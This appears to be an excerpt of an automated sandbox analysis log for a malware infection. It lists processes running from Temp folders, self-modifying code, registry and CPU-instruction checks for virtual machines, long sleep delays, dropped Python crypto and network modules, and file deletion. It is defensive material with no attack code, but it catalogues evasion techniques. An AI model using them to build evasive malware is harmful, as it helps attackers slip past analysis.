Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Special instruction interceptor: First address: 796DB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Special instruction interceptor: First address: A1DD26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Special instruction interceptor: First address: BBE36E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Special instruction interceptor: First address: BBC954 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Special instruction interceptor: First address: A1DC7C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Special instruction interceptor: First address: BD0B23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 2A2A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 43B900 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 4C6DB4 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Memory allocated: 21039F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Memory allocated: 21053A80000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

Code function: 10_2_053406BE rdtsc

10_2_053406BE

Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe

Code function: 27_2_00007FFE004E8816 sgdt fword ptr [rax]

27_2_00007FFE004E8816

Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe

Code function: PyList_New,OpenSCManagerA,GetLastError,PyErr_SetFromWindowsErrWithFilename,EnumServicesStatusExW,GetLastError,free,malloc,EnumServicesStatusExW,PyUnicode_FromWideChar,PyUnicode_FromWideChar,Py_BuildValue,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,

27_2_00007FFE0E1781E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6622	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3033	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7367	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2508	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 5001
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 3512
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Window / User API: threadDelayed 3783
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4681
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 606
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3183
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2980

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\zstandard\backend_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\charset_normalizer\md__mypyc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\pythoncom312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\zstandard\_cffi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\websockets\speedups.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10106740101\f5042cb50f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\charset_normalizer\md.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_elementtree.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\5c9465cda4.exe	API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	API coverage: 0.8 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2936	Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 2936	Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 480	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 480	Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7408	Thread sleep count: 306 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7408	Thread sleep time: -9180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4124	Thread sleep count: 5001 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4124	Thread sleep time: -10007001s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7492	Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7492	Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3156	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3156	Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4124	Thread sleep count: 3512 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4124	Thread sleep time: -7027512s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe TID: 8132	Thread sleep count: 3783 > 30
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe TID: 8120	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe TID: 7204	Thread sleep count: 79 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424	Thread sleep count: 2679 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944	Thread sleep count: 3459 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6992	Thread sleep count: 606 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep count: 3183 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6632	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 7522 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 951 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5620	Thread sleep count: 6299 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5620	Thread sleep count: 2980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ADDBBE
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE68EE FindFirstFileW,FindClose,	0_2_00AE68EE
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00AE698F
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ADD076
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ADD3A9
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AE9642
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AE979D
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00AE9B2B
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00AE5C97

Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe

27_2_00007FFE0E172E70

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A742DE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: rapes.exe, rapes.exe, 0000000C.00000002.1807867584.0000000000870000.00000040.00000001.01000000.0000000F.sdmp, TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000002.1829358941.0000000000AF0000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: chromium.exe, 0000001B.00000002.2545605526.000001D12803C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Clfvmware
